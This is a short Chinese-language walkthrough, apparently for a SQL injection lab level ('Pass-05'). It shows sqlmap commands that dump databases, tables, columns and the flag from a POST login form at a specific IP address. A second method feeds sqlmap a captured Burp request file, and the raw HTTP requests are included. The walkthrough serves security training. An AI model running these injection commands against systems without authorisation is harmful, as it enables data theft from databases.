POST注入
方法一加—form跑数据库
sqlmap.py -u http://59.63.200.79:8815/Pass-05/index.php —form —dbs
跑出数据库后查询表名 假设库名是error
sqlmap.py -u http://59.63.200.79:8815/Pass-05/index.php —form —dbs -D error —tables
得到表名后查询字段 字段名error_flag
sqlmap.py -u http://59.63.200.79:8815/Pass-05/index.php —form —dbs -D error -T error_flag —columns
跑字段值 值是flag 加—dump拿到数据
sqlmap.py -u http://59.63.200.79:8815/Pass-05/index.php —form —dbs -D error -T error_flag -C flag —dump
方法二
用BURP抓包后保存数据包这里保存为1.txt文件
抓包前
POST /Pass-05/index.php HTTP/1.1
Host: 59.63.200.79:8815
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://59.63.200.79:8815
Connection: close
Referer: http://59.63.200.79:8815/Pass-05/index.php
Upgrade-Insecure-Requests: 1

username=admin&password=admin&submit=%E7%99%BB%E5%BD%95

打开保存数据包文件1.txt
抓包后在认为存在注入的地方打
POST /Pass-05/index.php HTTP/1.1
Host: 59.63.200.79:8815
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://59.63.200.79:8815
Connection: close
Referer: http://59.63.200.79:8815/Pass-05/index.php
Upgrade-Insecure-Requests: 1

username=1&password=1&submit=%E7%99%BB%E5%BD%95
用到-r的参数 后面的和方法1一样跑
sqlmap.py -r C:\Users\ceshi\Desktop\1.txt.txt —dbs

最新文章

  1. Maven入门示例(3):自动部署至外部Tomcat
  2. sublime Text3使用笔记
  3. 如何保存联系人到系统通讯录(android)
  4. java编程中Properties类的具体作用和使用
  5. 【SVN】自动备份SVN仓库
  6. virtualenv创建虚拟环境安装flask
  7. play项目部署
  8. 轻松学习Linux之自动执行任务
  9. 黑马程序员—C语言的判断语句
  10. C# 添加、获取及删除PDF附件
  11. 39.QT-Qtxlsx库使用
  12. 《Gradle权威指南》--Gradle构建脚本基础
  13. SQL SERVER 2016研究二
  14. html与js和php之间实现数据交互
  15. timestamp与timedelta,管理信息系统概念与基础
  16. final发布简评
  17. Java第三阶段学习(六、多线程)
  18. Caffe训练AlexNet网络模型——问题三
  19. 【转】【WebStorm】利用WebStorm来管理你的Github
  20. Linux基础命令---service

热门文章

  1. [HNOI2008]明明的烦恼(prufer序列,高精度,质因数分解)
  2. oracle 11g数据库服务器安装
  3. Linux中软件安装包的格式
  4. 从头学pytorch(二十二):全连接网络dense net
  5. 练习2-14 求奇数分之一序列前N项和 (15 分)
  6. Jenkins report 打开样式失败解决方案
  7. HDU 1005 Number Sequence(矩阵快速幂,快速幂模板)
  8. [Effective Java 读书笔记] 第三章类和接口 第二十-二十一条
  9. WLAN802.11
  10. 使用matplotlib画图